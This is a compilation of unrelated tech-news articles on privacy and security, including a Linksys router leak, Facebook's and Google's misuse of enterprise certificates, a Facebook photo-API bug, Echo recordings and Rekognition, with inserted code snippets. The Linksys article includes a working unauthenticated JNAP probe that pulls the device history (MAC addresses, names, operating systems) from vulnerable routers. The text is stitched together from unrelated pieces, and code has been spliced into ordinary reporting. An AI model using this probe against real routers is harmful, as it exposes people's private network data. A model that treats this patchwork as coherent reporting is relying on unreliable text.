>20,000 Linksys routers leak historic record of every device ever connected

(credit: Troy Mursch)

Independent researcher Troy Mursch said the leak is the result of a flaw in almost three dozen models of Linksys routers. It took about 25 minutes for the BinaryEdge search engine for Internet-connected devices to find 21,401 vulnerable devices on Friday. A scan earlier in the week found 25,617. They were leaking a total of 756,565 unique MAC addresses. Exploiting the flaw requires only a few lines of code that harvest every MAC address, device name, and operating system that has ever connected to each router.
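
To make the "few lines of code" claim concrete, here is a minimal sketch of the kind of unauthenticated probe involved. It assumes the routers answer JNAP requests on a public /JNAP/ endpoint and that the GetDevices action returns the historical device table; those details are assumptions based on Linksys' SMART Wi-Fi protocol rather than something confirmed by this article, and any probing should only be done against hardware you own.

```python
# Hypothetical probe for a single Linksys SMART Wi-Fi router you control.
# Endpoint, action name, and response fields are assumptions, not confirmed here.
import requests

def probe_router(host: str, timeout: int = 10):
    """Ask a router for its historical device list via an unauthenticated JNAP call."""
    resp = requests.post(
        f"http://{host}/JNAP/",
        headers={
            # JNAP passes the requested action in a header; vulnerable firmware
            # answers without any credentials, which is the heart of the flaw.
            "X-JNAP-Action": "http://linksys.com/jnap/devicelist/GetDevices",
            "Content-Type": "application/json",
        },
        data="{}",
        timeout=timeout,
    )
    resp.raise_for_status()
    devices = resp.json().get("output", {}).get("devices", [])
    # Each entry typically carries a MAC address, a friendly name, and an OS hint:
    # the same fields Mursch found leaking.
    return [
        {
            "mac": (d.get("knownMACAddresses") or [None])[0],
            "name": d.get("friendlyName"),
            "os": (d.get("unit") or {}).get("operatingSystem"),
        }
        for d in devices
    ]
```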

Google unveils auto-delete for location, Web activity, and app usage data

Mountain View, Calif., May 21, 2018: Exterior view of a Googleplex building, the corporate headquarters of Google and parent company Alphabet. (credit: Getty Images | zphotos)

Google will soon let users automatically delete location history and other private data in rolling intervals of either three months or 18 months.

“Choose a time limit for how long you want your activity data to be saved—3 or 18 months—and any data older than that will be automatically deleted from your account on an ongoing basis,” Google announced yesterday. “These controls are coming first to Location History and Web & App Activity and will roll out in the coming weeks.”
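
The mechanics amount to a rolling retention window: on each pass, anything older than the chosen cutoff is purged. A toy sketch of the idea (not Google's implementation; record timestamps are assumed to be timezone-aware datetimes):

```python
# Illustrative rolling-retention pass, approximating months as 30 days.
from datetime import datetime, timedelta, timezone

def apply_retention(records, months):
    """Keep only records newer than the 3- or 18-month window."""
    assert months in (3, 18), "the announced options are 3 or 18 months"
    cutoff = datetime.now(timezone.utc) - timedelta(days=30 * months)
    return [r for r in records if r["timestamp"] >= cutoff]
```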

Google location history saves locations reported from mobile devices that are logged into your Google account, while saved Web and app activity includes “searches and other things you do on Google products and services, like Maps; your location, language, IP address, referrer, and whether you use a browser or an app; Ads you click, or things you buy on an advertiser’s site; [and] Information on your device like recent apps or contact names you searched for.”

Everything you need to know about Facebook, Google’s app scandal

Facebook and Google landed in hot water with Apple this week after two investigations by TechCrunch revealed the misuse of internal-only certificates — leading to their revocation and a day of downtime at the two tech giants.

Confused about what happened? Here’s everything you need to know.

How did all this start, and what happened?

On Monday, we revealed that Facebook was misusing an Apple-issued enterprise certificate that is only meant for companies to use to distribute internal, employee-only apps without having to go through the Apple App Store. But the social media giant used that certificate to sign an app that Facebook distributed outside the company, violating Apple’s rules.

The app, known simply as “Research,” allowed Facebook unparalleled access to all of the data flowing out of a device. This included access to some of the users’ most sensitive network data. Facebook paid users — including teenagers — $20 per month to install the app. But it wasn’t clear exactly what kind of data was being vacuumed up, or for what reason.

It turns out that the app was a repackaged version of one that was effectively banned from Apple’s App Store last year for collecting too much data on users.

Apple was angry that Facebook was misusing its special-issue enterprise certificates to push an app it had already banned, and revoked the certificate — rendering the app unable to open. But Facebook was using that same certificate to sign its other employee-only apps, so the revocation effectively knocked them offline until Apple re-issued the certificate.

Then, it turned out Google was doing almost exactly the same thing with its Screenwise app, and Apple’s ban-hammer fell again.

What’s the controversy over these enterprise certificates and what can they do?

If you want to develop Apple apps, you have to abide by its rules — and Apple expressly makes companies agree to its terms.

A key rule is that Apple doesn’t allow app developers to bypass the App Store, where every app is vetted to ensure it’s as secure as it can be. It does, however, grant exceptions for enterprise developers, such as to companies that want to build apps that are only used internally by employees. Facebook and Google in this case signed up to be enterprise developers and agreed to Apple’s developer terms.

Each Apple-issued certificate grants companies permission to distribute apps they develop internally — including pre-release versions of the apps they make, for testing purposes. But these certificates aren’t allowed to be used to distribute apps to ordinary consumers, who have to download apps through the App Store.

What’s a “root” certificate, and why is its access a big deal?

Because Facebook’s Research and Google’s Screenwise apps were distributed outside of Apple’s App Store, users had to install them manually — a process known as sideloading. That requires going through a convoluted few steps: downloading the app itself, then opening and trusting either Facebook or Google’s enterprise developer code-signing certificate, which is what allows the app to run.

Both companies required users, after installing the app, to agree to an additional configuration step — known as a VPN configuration profile — that funnels all of the data flowing out of the user’s phone through a special tunnel directing it to either Facebook or Google, depending on which app was installed.

This is where the Facebook and Google cases differ.

Google’s app collected data and sent it off to Google for research purposes, but couldn’t access encrypted data — such as the content of any network traffic protected by HTTPS, as most apps in the App Store and internet websites are.

Facebook, however, went far further. Its users were asked to go through an additional step to trust an additional type of certificate at the “root” level of the phone. Trusting this Facebook Research root certificate authority allowed the social media giant to look at all of the encrypted traffic flowing out of the device — essentially what we call a “man-in-the-middle” attack. That allowed Facebook to sift through your messages, your emails and any other bit of data that leaves your phone. Only apps that use certificate pinning — which rejects any certificate other than the app’s own — were protected, such as iMessage, Signal and other end-to-end encrypted apps.
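
Certificate pinning defeats this kind of interception because the app compares the certificate actually presented on the wire against a fingerprint it ships with, so even a certificate chaining to a root the user was tricked into trusting gets rejected. A minimal sketch of the idea (the pinned hash is a placeholder, not any real service’s fingerprint):

```python
# Toy certificate-pinning check: trust the connection only if the server's leaf
# certificate matches a fingerprint bundled with the app.
import hashlib
import socket
import ssl

PINNED_SHA256 = "0" * 64  # placeholder fingerprint

def check_pin(host: str, port: int = 443) -> bool:
    context = ssl.create_default_context()
    with socket.create_connection((host, port)) as sock:
        with context.wrap_socket(sock, server_hostname=host) as tls:
            der_cert = tls.getpeercert(binary_form=True)  # cert as presented on the wire
            fingerprint = hashlib.sha256(der_cert).hexdigest()
    if fingerprint != PINNED_SHA256:
        # A man-in-the-middle certificate -- even one signed by a root CA the user
        # was persuaded to install -- fails this comparison.
        raise ssl.SSLError("certificate fingerprint mismatch")
    return True
```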

Facebook’s Research app requires root certificate access, which lets Facebook gather almost any piece of data transmitted by your phone (Image: supplied)

Google’s app might not have been able to look at encrypted traffic, but the company still flouted the rules — and had its separate enterprise developer code-signing certificate revoked anyway.

What data did Facebook have access to on iOS?

It’s hard to know for sure, but it definitely had access to more data than Google.

Facebook said its app was to help it “understand how people use their mobile devices.” In reality, at the root traffic level, Facebook could have accessed any kind of data that left your phone.

Will Strafach, a security expert with whom we spoke for our story, said: “If Facebook makes full use of the level of access they are given by asking users to install the certificate, they will have the ability to continuously collect the following types of data: private messages in social media apps, chats from instant messaging apps – including photos/videos sent to others, emails, web searches, web browsing activity, and even ongoing location information by tapping into the feeds of any location tracking apps you may have installed.”

Remember: this isn’t “root” access to your phone, like jailbreaking, but root access to the network traffic.

How does this compare to the technical ways other market research programs work?

In fairness, market research apps like these aren’t unique to Facebook or Google. Several other companies, like Nielsen and comScore, run similar programs, but neither asks users to install a VPN or grant root access to their network traffic.

In any case, Facebook already has a lot of your data — as does Google. Even if the companies only wanted to look at your data in aggregate with other people’s, they can still home in on who you talk to, when, for how long and, in some cases, what about. It might not have been such an explosive scandal had Facebook not spent the last year cleaning up after several security and privacy breaches.

Can they capture the data of people the phone owner interacts with?

In both cases, yes. In Google’s case, any unencrypted data involving another person could have been collected. In Facebook’s case, it goes far further: any data of yours that involves another person, such as an email or a message, could have been collected by Facebook’s app.

How many people did this affect?

It’s hard to know for sure. Neither Google nor Facebook has said how many users its program had; between them, it’s believed to be in the thousands. As for the employees affected by the app outages, Facebook has more than 35,000 employees and Google has more than 94,000.

Why did internal apps at Facebook and Google break after Apple revoked the certificates?

You might own your Apple device, but Apple still gets to control what goes on it.

Apple can’t control Facebook’s root certificates, but it can control the enterprise certificates it issues. After Facebook was caught out, Apple said: “Any developer using their enterprise certificates to distribute apps to consumers will have their certificates revoked, which is what we did in this case to protect our users and their data.” That meant any app relying on Facebook’s enterprise certificate — including those used inside the company — would fail to load. That included not just the pre-release builds of Facebook, Instagram and WhatsApp that staff were working on; reportedly the company’s travel and collaboration apps went down too. In Google’s case, even its catering and lunch menu apps were down.

Facebook’s internal apps were down for about a day, while Google’s internal apps were down for a few hours. None of Facebook or Google’s consumer services were affected, however.

How are people viewing Apple in all this?

Nobody seems thrilled with Facebook or Google at the moment, but not many are happy with Apple, either. Even though Apple sells hardware and doesn’t use your data to profile you or serve you ads — like Facebook and Google do — some are uncomfortable with how much power Apple has over the customers — and enterprises — that use its devices.

Revoking Facebook’s and Google’s enterprise certificates and causing downtime had a knock-on effect inside both companies.

Is this legal in the U.S.? What about in Europe with GDPR?

Well, it’s not illegal — at least in the U.S. Facebook says it gained consent from its users. The company even said its teenage users must obtain parental consent, even though that step was easily skippable and no verification checks were made. It wasn’t even explicitly clear that the children who “consented” understood how much privacy they were handing over.

That could lead to major regulatory headaches down the line. “If it turns out that European teens have been participating in the research effort Facebook could face another barrage of complaints under the bloc’s General Data Protection Regulation (GDPR) — and the prospect of substantial fines if any local agencies determine it failed to live up to consent and ‘privacy by design’ requirements baked into the bloc’s privacy regime,” wrote TechCrunch’s Natasha Lomas.

Who else has been misusing certificates?

Don’t think that Facebook and Google are alone in this. It turns out that a lot of companies might be flouting the rules, too.

According to examples that people have surfaced on social media, Sonos uses enterprise certificates for its beta program, as does finance app Binance, as well as DoorDash for its fleet of contractors. It’s not known if Apple will also revoke their enterprise certificates.

What next?

It’s anybody’s guess, but don’t expect this situation to die down any time soon.

Facebook may face repercussions with Europe, as well as at home. Two U.S. senators, Mark Warner and Richard Blumenthal, have already called for action, accusing Facebook of “wiretapping teens.” The Federal Trade Commission may also investigate, if Blumenthal gets his way.

Facebook bug exposed up to 6.8M users’ unposted photos to apps

Reset the “days since the last Facebook privacy scandal” counter, as Facebook has just revealed a Photo API bug gave app developers too much access to the photos of up to 6.8 million users. The bug allowed apps that users had approved to pull their timeline photos to also receive their Facebook Stories, Marketplace photos and, most worryingly, photos they’d uploaded to Facebook but never shared. Facebook says the bug ran for 12 days, from September 13th to September 25th. Facebook tells TechCrunch it discovered the breach on September 25th and informed its European privacy watchdog, Ireland’s Office of the Data Protection Commissioner (IDPC), on November 22nd. The IDPC has begun a statutory inquiry into the breach.
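
For context, an app with the user_photos permission would normally pull only timeline photos through the Graph API, roughly as sketched below; the API version, field list, and token are illustrative placeholders rather than Facebook-confirmed details. The bug meant a call like this could return far more than it should have.

```python
# Hypothetical Graph API request by an app the user has approved.
# The access token, API version, and field list are placeholders.
import requests

def fetch_timeline_photos(access_token: str):
    resp = requests.get(
        "https://graph.facebook.com/v3.2/me/photos",
        params={
            "type": "uploaded",                # photos the user uploaded themselves
            "fields": "id,created_time,link",
            "access_token": access_token,      # scoped by the user_photos permission
        },
        timeout=10,
    )
    resp.raise_for_status()
    # Under the bug, results were not limited to shared timeline photos:
    # Stories, Marketplace photos, and never-posted uploads could appear too.
    return resp.json().get("data", [])
```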

By way of apology, Facebook offered merely a glib “We’re sorry this happened.” It will provide tools next week for app developers to check whether they were impacted, and it will work with them to delete photos they shouldn’t have. The company plans to notify people it suspects may have been impacted by the bug via a Facebook notification that will direct them to the Help Center, where they’ll see whether they used any apps affected by the bug. It’s recommending users log into those apps to check whether they have wrongful photo access. Facebook has shared a mockup of the warning notification users will see.

Facebook initially didn’t disclose when it discovered the bug, but in response to TechCrunch’s inquiry, a spokesperson says that it was discovered and fixed on September 25th. They say it took time for the company to investigate which apps and people were impacted, and to build and translate the warning notification it will send impacted users. The delay could put Facebook at risk of GDPR fines for not promptly disclosing the issue within 72 hours; those fines can reach 20 million euros or 4 percent of annual global revenue.
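
As rough arithmetic, the cap cited here is the greater of the flat figure and the revenue percentage. A back-of-the-envelope sketch (the revenue number is a hypothetical placeholder, not Facebook’s actual turnover):

```python
# Back-of-the-envelope GDPR exposure: the cited cap is the greater of
# EUR 20 million or 4 percent of annual worldwide revenue.
def gdpr_max_fine(annual_global_revenue_eur: float) -> float:
    return max(20_000_000.0, 0.04 * annual_global_revenue_eur)

# Hypothetical example with EUR 35 billion in annual revenue:
print(f"EUR {gdpr_max_fine(35e9):,.0f}")  # EUR 1,400,000,000
```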

However, Facebook tells me it notified the IDPC, which oversees GDPR, on November 22nd, as soon as it established the bug was considered a reportable breach under GDPR guidelines. It says that it had to investigate to reach that conclusion and then let the IDPC know within 72 hours once it had. The IDPC’s head of communications, Graham Doyle, tells TechCrunch: “The Irish DPC has received a number of breach notifications from Facebook since the introduction of the GDPR on May 25, 2018. With reference to these data breaches, including the breach in question, we have this week commenced a statutory inquiry examining Facebook’s compliance with the relevant provisions of the GDPR.”

Facebook tells me the bug did not impact photos privately shared through Messenger. The bug also wouldn’t have exposed photos users never uploaded to Facebook from their camera roll or computer. But photos users uploaded and then decided not to post, that got interrupted by connectivity issues, or that they otherwise never finished sharing could have wound up with app developers.

The privacy failure will further weaken confidence that Facebook is a responsible steward for our private data. It follows Facebook’s massive security breach that allowed hackers to scrape 30 million people’s information back in September. There was also November’s bug allowing websites to read users’ Likes, October’s bug that mistakenly deleted people’s Live videos, and May’s bug that changed people’s status update composer privacy settings. It increasingly looks like the social network has gotten too big for the company to secure. Curiously, Facebook discovered the bug on September 25th, the same day as its 30 million user breach. Perhaps it kept a lid on the situation in hopes of not creating an even bigger scandal.

That Facebook keeps photos you partially uploaded but never posted is creepy, but the fact that these could be exposed to third-party developers is truly unacceptable. And that Facebook seems so worn down by its own failings that it couldn’t put forward even a seemingly heartfelt apology is telling. The company’s troubles are souring not only users on Facebook, but employees and the tech industry at large as well. CEO Mark Zuckerberg told Congress earlier this year that “We have a responsibility to protect your data, and if we can’t then we don’t deserve to serve you.” What does Facebook deserve at this point?

Facebook Portal adds games and web browser amidst mediocre Amazon reviews

After receiving a flogging from privacy critics, Facebook is scrambling to make its smart display video chat screen Portal more attractive to buyers. Today Facebook is announcing the addition of a web browser, plus some of Messenger’s Instant Games like Battleship, Draw Something, Sudoku and Words With Friends. ABC News and CNN are adding content to Portal, which now also has a manual zoom mode for its auto-zooming smart camera so you can zero in on a particular thing in view. Facebook has also added new augmented reality Story Time tales, seasonal AR masks, in-call music sharing through iHeartRadio (beyond Spotify and Pandora, which already offer it), and nickname calling so you can say “Hey Portal, call Mom.”

But the question remains: who’s buying? Facebook is already discounting the 10-inch-screen Portal and 15-inch Portal+. Having formerly offered $100 off if you bought two, Facebook is still offering $50 off a single unit until Christmas Eve as part of a suspiciously long Black Friday sale. That doesn’t signal this thing is flying off the shelves. We don’t have sales figures, but Portal has a 3.4 rating on Amazon, while Portal+ has a 3.6 — both trailing the 4.2 rating of Amazon’s own Echo Show 2. Users are griping about the lack of support for Amazon Video and Ring doorbells, about not receiving calls and, of course, about the privacy implications.

Personally, I’ve found Portal+ to be competent in the five weeks since launch. The big screen is great as a smart photo frame and video calls look sharp. But Alexa and Facebook’s own voice assistant have a tough time dividing up functionality, and sometimes I can’t get either one to play a specific song on Spotify, pause, change the volume, or do other things my Google Home has no trouble with. Facebook said it was hoping to add Google Assistant to Portal, but there’s no progress on that front yet.

The browser will be a welcome addition, and will allow Facebook to sidestep some of the issues around its thin app platform. While it recently added a smart TV version of YouTube, the browser means users can now access lots of services without those developers having to commit to building something for Portal, given its uncertain future.

The hope seems to be that mainstream users who aren’t glued to the tech press, where Facebook is constantly skewered, might be drawn in by these devices’ flashy screens and the admittedly impressive auto-zooming camera. But to overcome the brand tax levied by all of Facebook’s privacy scandals, Portal must be near perfect. Without native apps for popular video providers like Netflix and Hulu, consistent voice recognition, and more unique features than competing smart displays offer, the fear of Facebook’s surveillance may outweigh people’s love for shiny new gadgets.

Judge orders Amazon to turn over Echo recordings in double murder case

A New Hampshire judge has ordered Amazon to turn over two days of Amazon Echo recordings in a double murder case.

Prosecutors believe that recordings from an Amazon Echo in a Farmington home where two women were murdered in January 2017 may yield further clues to their killer. Although police seized the Echo when they secured the crime scene, any recordings are stored on Amazon servers.

The order granting the search warrant, obtained by TechCrunch, said that there is “probable cause to believe” that the Echo picked up “audio recordings capturing the attack” and “any events that preceded or succeeded the attack.”

Amazon is also directed to turn over any “information identifying any cellular devices that were linked to the smart speaker during that time period,” the order said.

Timothy Verrill, a resident of neighboring Dover, New Hampshire, was charged with two counts of first-degree murder. He pleaded not guilty and awaits trial.

When reached, an Amazon spokesperson did not comment — but the company told the Associated Press last week that it won’t release the information “without a valid and binding legal demand properly served on us.”

New Hampshire doesn’t provide electronic access to court records, so it’s not readily known if Amazon has complied with the order, signed by Justice Steven Houran, on November 5.

A court order signed by New Hampshire Superior Court on November 5 ordering Amazon to turn over Echo recordings. (Image: TechCrunch)

It’s not the first time Amazon has been ordered to turn over recordings that prosecutors believe may help a police investigation.

Three years ago, an Arkansas man was accused of murder. Prosecutors pushed Amazon to turn over data from an Echo found in the house where the body was found. Amazon initially resisted the request, citing First Amendment grounds, but later conceded and complied. Police and prosecutors generally don’t expect much evidence from Echo recordings — if any — because Echo speakers are activated with a wake word, usually “Alexa,” the name of the voice assistant. But sometimes fragments of recordings can be inadvertently picked up, which could help piece together events from a crime scene.

But these two cases represent just a fraction of the requests Amazon receives for Echo data. Although Amazon publishes a biannual transparency report detailing the number of warrants and orders it receives across its entire business, the company doesn’t break out — and refuses to say — how many of those requests are for Echo data.

In most cases, requests for Echo recordings only become known through court orders.

In fact, when TechCrunch reached out to the major players in the smart home space, only one device maker had a transparency report and most had no future plans to publish one — leaving consumers in the dark on how these companies protect their private information from overly broad demands.

Although the evidence in the Verrill case is compelling, exactly what comes back from Amazon — or the company’s refusal to budge — will be telling.

Instagram prototypes handing your location history to Facebook

This is sure to exacerbate fears that Facebook will further exploit Instagram now that its founders have resigned. Instagram has been spotted prototyping a new privacy setting that would allow it to share your location history with Facebook. That means your exact GPS coordinates collected by Instagram, even when you’re not using the app, would help Facebook target you with ads and recommend relevant content. The geo-tagged data would appear to users in their Facebook Profile’s Activity Log, which includes creepy daily maps of the places you’ve been.

This commingling of data could upset users who want to limit Facebook’s surveillance of their lives. With Facebook installing its former VP of News Feed and close friend of Mark Zuckerberg, Adam Mosseri, as the head of Instagram, some critics have worried that Facebook would attempt to squeeze more value out of Instagram. That includes driving referral traffic to the main app via spammy notifications, inserting additional ads, or pulling in more data. Facebook was fined $122 million by European regulators for breaking its promise that it would not commingle WhatsApp and Facebook data.

A Facebook spokesperson tells TechCrunch that “To confirm, we haven’t introduced updates to our location settings. As you know, we often work on ideas that may evolve over time or ultimately not be tested or released. Instagram does not currently store Location History; we’ll keep people updated with any changes to our location settings in the future.” That effectively confirms Location History sharing is something Instagram has prototyped, and that it’s considering launching but hasn’t yet.

The screenshots come courtesy of mobile researcher and frequent TechCrunch tipster Jane Manchun Wong. Her prior finds like prototypes of Instagram Video Calling and Music Stickers have drawn “no comments” from Instagram but then were officially launched in the following months. That lends credence to the idea that Instagram is serious about Location History.

Located in the Privacy and Security settings, the Location History option “Allows Facebook Products, including Instagram and Messenger, to build and use a history of precise locations received through Location Services on your device.”

A ‘Learn More’ button provides additional info:

“Location History is a setting that allows Facebook to build a history of precise locations received through Location Services on your device. When Location History is on, Facebook will periodically add your current precise location to your Location History even if you leave the app. You can turn off Location History at any time in your Location Settings on the app. When Location History is turned off, Facebook will stop adding new information to your Location History which you can view in your Location Settings. Facebook may still receive your most recent precise location so that you can, for example, post content that’s tagged with your location. Location History helps you explore what’s around you, get more relevant ads, and helps improve Facebook. Location History must be turned on for some location feature to work on Facebook, including Find Wi-Fi and Nearby Friends.”

It’s unclear whether the feature would launch as opt-in or opt-out. [Correction: The prototype defaulted to off and Wong had to turn it on.] As part of a 2011 settlement with the FTC over privacy violations, Facebook agreed that “Material retroactive changes to the audience that can view the information users have previously shared on Facebook” must now be opt-in. But since Location History is never visible to other users and only deals with data Facebook sees, it’s exempt from that agreement and could be quietly added. If launched as opt-out, most users might never dig deep enough into their privacy settings to turn the feature off.

Delivering the exact history of where Instagram users went could help Facebook target them with local ads across its family of apps. If users are found to visit certain businesses, countries, neighborhoods, or schools, Facebook could use that data to infer which products they might want to buy and promote them. It could even show ads for restaurants or shops close to where users spend their days. Just yesterday, we reported that Facebook was testing a redesign of its Nearby Friends feature that replaces the list view of friends’ locations with a map. Pulling in Location History from Instagram could help keep that map up to date.

Sources tell TechCrunch that Instagram founders Kevin Systrom and Mike Krieger left the company following increasing tensions with Zuckerberg over the dwindling autonomy of their app within the Facebook corporation. Systrom apparently clashed with Zuckerberg over how Instagram was supposed to contribute to Facebook’s success, especially as younger users began abandoning the older social network for the newer visual media app. Facebook is under pressure to keep up revenue growth even as it runs out of News Feed ad inventory and users shift to Stories, a format advertisers are still acclimating to. Facebook is in heated competition with Google for last-mile local advertising and will take any advantage it can get.

Instagram has served as a life raft for Facebook’s brand this year amidst an onslaught of scandals including fake news, election interference, social media addiction, and most recently, a security breach that gave hackers the access tokens for 50 million users that could have let them take over their accounts. A survey of 1,153 US adults conducted in March 2018 found that 57 percent of them didn’t know Instagram was owned by Facebook. But if Facebook treats Instagram as a source of data and traffic it can strip mine, the negative perceptions associated with the parent could spill over onto the child.

Mozilla’s Firefox Monitor will now alert you when one of your accounts was hacked

Earlier this year, Mozilla announced Firefox Monitor, a service that tells you if your online accounts were hacked in a recent data breach. All you have to give it is your email address and it’ll use the Have I Been Pwned database to show you if you need to worry and what data was compromised. Today, Mozilla is taking this a step further by also letting you sign up for alerts for when your accounts appear in any (known) breaches in the future.
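
Under the hood, this kind of lookup amounts to querying Have I Been Pwned for a given address. Here is a rough sketch of such a query using HIBP’s public v3 “breachedaccount” endpoint, which requires an API key; the key and user agent below are placeholders, and Mozilla’s actual integration may differ.

```python
# Sketch of a breach lookup against Have I Been Pwned (HIBP v3 API).
# YOUR_API_KEY is a placeholder; HIBP requires a registered key and a user agent.
import requests

def breaches_for(email: str, api_key: str = "YOUR_API_KEY"):
    resp = requests.get(
        f"https://haveibeenpwned.com/api/v3/breachedaccount/{email}",
        headers={"hibp-api-key": api_key, "user-agent": "breach-check-demo"},
        params={"truncateResponse": "false"},
        timeout=10,
    )
    if resp.status_code == 404:
        return []            # address not found in any known breach
    resp.raise_for_status()  # surfaces rate limiting (429) and auth errors
    # Each entry names the breach and the data classes exposed in it.
    return [(b["Name"], b.get("DataClasses", [])) for b in resp.json()]
```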

When it first launched, Mozilla considered Firefox Monitor an experimental service. Now, it’s being launched as an official service.

If none of your accounts have been hacked yet, consider yourself lucky. That still makes you the perfect user for Firefox Monitor’s new alerting feature, though, because chances are your email address will show up in a future breach sooner or later. Indeed, when Mozilla first asked people which features they most wanted from a service like this, notifications about future breaches were very high on most people’s lists.

Mozilla notes that Firefox Monitor is just one of a number of new data and privacy features the organization has on its roadmap for the next few months. It’s clear that Mozilla is positioning itself as a neutral force, and overall that seems to be going quite well, especially given that Google’s Chrome browser is facing a bit of a backlash these days as users grow increasingly concerned about their privacy and the vast trove of data Google collects.

Congress members demand answers from Amazon about facial recognition software

When we wrote about the ACLU’s Amazon Rekognition press release earlier today, we called it an “attention-grabbing stunt” — well, consider that attention grabbed. Several Democratic members of Congress have responded with strongly worded letters to Amazon founder Jeff Bezos.

Reps. Jimmy Gomez and John Lewis issued a letter to Bezos after the ACLU noted that the facial recognition software falsely associated 28 images of Congress members with mugshots in a criminal database. Lewis, a pivotal figure in America’s civil rights movement, was among those falsely matched in the ACLU’s testing — especially notable as the false matches appeared to skew against people of color.

“The results of the ACLU’s test of Amazon’s ‘Rekognition’ software are deeply troubling,” Lewis wrote in a statement. “As a society, we need technology to help resolve human problems, not to add to the mountain of injustices presently facing people of color in this country. Black and brown people are already unjustly targeted through a discriminatory sentencing system that has led to mass incarceration and devastated millions of families.”

A trio of Congress members (Sen. Ed Markey and Reps. Luis Gutiérrez and Mark DeSaulnier), meanwhile, wrote a letter addressed to Bezos with a series of questions about the technology:

While facial recognition services might provide a valuable law enforcement tool, the efficacy and impact of the technology are not yet fully understood. In particular, serious concerns have been raised about the dangers facial recognition can pose to privacy and civil rights, especially when it is used as a tool of government surveillance, as well as the accuracy of the technology and its disproportionate impact on communities of color.

Amazon, for its part, both defended Rekognition and disputed the ACLU’s methods. “We remain excited about how image and video analysis can be a driver for good in the world, including in the public sector and law enforcement,” the company wrote in a statement provided to TechCrunch.

With regard to testing, it says:

[W]e think that the results could probably be improved by following best practices around setting the confidence thresholds (this is the percentage likelihood that Rekognition found a match) used in the test. While 80% confidence is an acceptable threshold for photos of hot dogs, chairs, animals, or other social media use cases, it wouldn’t be appropriate for identifying individuals with a reasonable level of certainty. When using facial recognition for law enforcement activities, we guide customers to set a threshold of at least 95% or higher.
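
That threshold is a parameter the caller sets explicitly when using the service. As a rough sketch of what Amazon is describing, here is how a similarity threshold would be set in a Rekognition face-comparison call via boto3; the bucket and key names are placeholders, and this only illustrates the parameter, not the ACLU’s or Amazon’s actual test setup.

```python
# Illustrative Rekognition face comparison with an explicit similarity threshold.
# Bucket and object keys are placeholders.
import boto3

rekognition = boto3.client("rekognition")

def match_face(source_key: str, target_key: str, bucket: str = "example-bucket"):
    resp = rekognition.compare_faces(
        SourceImage={"S3Object": {"Bucket": bucket, "Name": source_key}},
        TargetImage={"S3Object": {"Bucket": bucket, "Name": target_key}},
        # The ACLU test reportedly used the 80 percent default; Amazon says
        # law-enforcement use should set this to at least 95.
        SimilarityThreshold=95.0,
    )
    return [(m["Similarity"], m["Face"]["BoundingBox"]) for m in resp["FaceMatches"]]
```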

The company also reiterated an earlier statement that Rekognition results are intended to be used to narrow down possibilities, rather than lead directly to arrests.

Regardless, the ACLU’s stunt certainly got the attention the organization was seeking, both with regard to the aforementioned biases and broader security implications of facial scanning for law enforcement.